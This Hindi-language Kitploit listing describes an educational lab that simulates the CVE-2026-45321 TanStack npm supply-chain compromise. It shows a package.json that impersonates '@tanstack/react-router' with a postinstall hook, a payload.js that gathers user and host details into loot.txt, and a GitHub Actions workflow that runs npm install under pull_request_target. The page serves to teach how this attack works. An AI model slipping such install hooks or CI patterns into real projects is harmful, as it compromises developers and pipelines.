Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-45321-Tanstack — npm आपूर्ति श्रृंखला हमलों, CI/CD दुरुपयोग, और CVE-2026-45321 के माध्यम से इंस्टॉल-टाइम कोड निष्पादन का अनुकरण करने वाला शैक्षिक प्रयोगशाला। निर्भरता समझौता और लाइफसाइकिल हुक शोषण को समझने के लिए व्यावहारिक रक्षात्मक सुरक्षा अनुसंधान। | Kitploit
उपकरण/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
भेद्यता विश्लेषणमालवेयर विश्लेषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

npm आपूर्ति श्रृंखला हमलों, CI/CD दुरुपयोग, और CVE-2026-45321 के माध्यम से इंस्टॉल-टाइम कोड निष्पादन का अनुकरण करने वाला शैक्षिक प्रयोगशाला। निर्भरता समझौता और लाइफसाइकिल हुक शोषण को समझने के लिए व्यावहारिक रक्षात्मक सुरक्षा अनुसंधान।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सप्लाई चेन अटैक सिमुलेशन — CVE-2026-45321 (TanStack)

npm सप्लाई चेन अटैक, CI/CD दुरुपयोग और इंस्टॉल-टाइम कोड निष्पादन को समझने के लिए शैक्षिक प्रयोगशाला

अस्वीकरण

यह प्रोजेक्ट केवल निम्नलिखित उद्देश्यों के लिए बनाया गया है:

  • साइबर सुरक्षा सीखना,
  • रक्षात्मक सुरक्षा अनुसंधान,
  • स्थानीय प्रयोगशाला सिमुलेशन,
  • सप्लाई चेन अटैक की अवधारणा को समझना।

इस प्रोजेक्ट का उपयोग निम्नलिखित के लिए न करें:

  • वास्तविक सिस्टम पर हमला करना,
  • क्रेडेंशियल चुराना,
  • मैलवेयर तैनात करना,
  • अनधिकृत पहुँच,
  • या कोई अन्य अवैध गतिविधि।

विवरण

यह प्रयोगशाला निम्नलिखित घटनाओं की मूल अवधारणा का अनुकरण करती है:

  • CVE-2026-45321
  • TanStack npm सप्लाई चेन समझौता
  • GitHub Actions CI/CD दुरुपयोग
  • npm जीवनचक्र स्क्रिप्ट निष्पादन

सिमुलेशन स्थानीय और सुरक्षित रूप से किया जाता है, बिना:

  • वास्तविक क्रेडेंशियल चोरी,
  • टोकन एक्सफिल्ट्रेशन,
  • या तृतीय-पक्ष सेवाओं से समझौता।

प्रयोगशाला संरचना

root@kitploit:~
lab/
├── fake-repo/          # लक्ष्य रिपॉजिटरी का सिमुलेशन
├── attacker-package/   # दुर्भावनापूर्ण पैकेज का सिमुलेशन
└── victim-project/     # पीड़ित का सिमुलेशन

सिमुलेशन कार्यप्रणाली

root@kitploit:~
हमलावर पैकेज
        ↓
npm install
        ↓
postinstall स्क्रिप्ट चलती है
        ↓
payload.js स्वचालित रूप से निष्पादित होता है
        ↓
पीड़ित इंस्टॉल-टाइम निष्पादन से प्रभावित होता है

सीखी गई अवधारणाएँ

  • npm जीवनचक्र हुक
  • इंस्टॉल-टाइम मनमाना कोड निष्पादन
  • सप्लाई चेन अटैक
  • CI/CD विश्वास सीमा
  • दुर्भावनापूर्ण npm पैकेज
  • postinstall दुरुपयोग
  • निर्भरता समझौता

स्थापना

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

हमलावर पैकेज सेटअप

2. हमलावर पैकेज फ़ोल्डर में जाएँ

root@kitploit:~
cd attacker-package

3. निर्भरता स्थापित करें

root@kitploit:~
npm install

4. टारबॉल पैकेज बनाएँ

root@kitploit:~
npm pack

परिणाम:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

पीड़ित सिमुलेशन

5. पीड़ित प्रोजेक्ट में जाएँ

root@kitploit:~
cd ../victim-project

6. दुर्भावनापूर्ण पैकेज स्थापित करें

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

आउटपुट

यदि सफल होता है, तो निम्नलिखित दिखाई देगा:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

और फ़ाइल:

root@kitploit:~
loot.txt

स्वचालित रूप से बन जाएगी।


payload.js का उदाहरण

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

package.json का उदाहरण

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD सिमुलेशन

यह प्रोजेक्ट निम्नलिखित को समझने के लिए भी उपयोग किया जा सकता है:

  • GitHub Actions
  • pull_request_target
  • CI/CD विशेषाधिकार सीमा
  • निर्भरता निष्पादन

वर्कफ़्लो का उदाहरण:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

CVE-2026-45321 से संबंध

प्रयोगशाला सिमुलेशनवास्तविक दुनिया
attacker-packageसमझौता किया गया TanStack पैकेज
payload.jsदुर्भावनापूर्ण इंस्टॉलर

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

केवल शैक्षिक उद्देश्य

यह प्रयोगशाला निम्नलिखित के बारे में जागरूकता बढ़ाने के लिए बनाई गई है:

  • सप्लाई चेन सुरक्षा,
  • निर्भरता सुरक्षा,
  • CI/CD सुरक्षा,
  • और रक्षात्मक सुरक्षा अनुसंधान।
टूल डाउनलोड करें
postinstallजीवनचक्र हुक दुरुपयोग
victim-projectपीड़ित डेवलपर/CI
fake-repoGitHub Actions पाइपलाइन